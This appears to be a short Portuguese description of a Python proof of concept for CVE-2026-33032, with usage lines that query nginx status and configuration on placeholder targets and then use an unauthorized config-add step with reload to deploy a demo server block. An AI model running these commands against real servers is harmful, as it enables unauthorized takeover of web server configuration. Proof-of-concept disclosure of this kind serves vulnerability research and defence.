
Prova de conceito em Python para CVE-2026-33032 que inspeciona o status e as configurações do nginx e, em seguida, demonstra escrita não autorizada de configuração com reload para implantar um bloco de servidor malicioso.
python3 main.py http://target:9000 --tool nginx_status
python3 main.py 10.0.0.50 --tool nginx_config_list
python3 main.py http://target:9000 \
--tool nginx_config_add \
--payload poc.conf \
--content 'server { listen 8443; return 200 "MCPwned\n"; }'